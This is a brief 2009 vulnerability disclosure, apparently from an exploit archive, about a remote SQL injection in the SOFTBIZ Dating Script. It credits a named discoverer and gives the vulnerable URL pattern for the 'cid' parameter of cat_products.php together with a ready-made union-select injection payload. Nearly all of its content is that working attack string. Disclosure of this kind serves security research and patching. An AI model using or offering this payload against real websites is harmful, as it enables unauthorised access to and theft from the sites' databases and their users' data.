Home / os / win10

softbizdating-sql.txt

Posted on 30 July 2009

/*

SOFTBIZ Dating Script (cid) Remote SQL Injection Vulnerability

Discovered by : MizoZ
Contact : mizozx@gmail.com

Date : July 29 2009

Greetings : Moudi , Zuka, All friends

*/

SQL Injection cat_products.php (GET : cid) :

[HOST]/[PATH]/cat_products.php?cid=[SQL INJ]

SQL INJ : -1+union+select+1,2,3,4,5--

 

TOP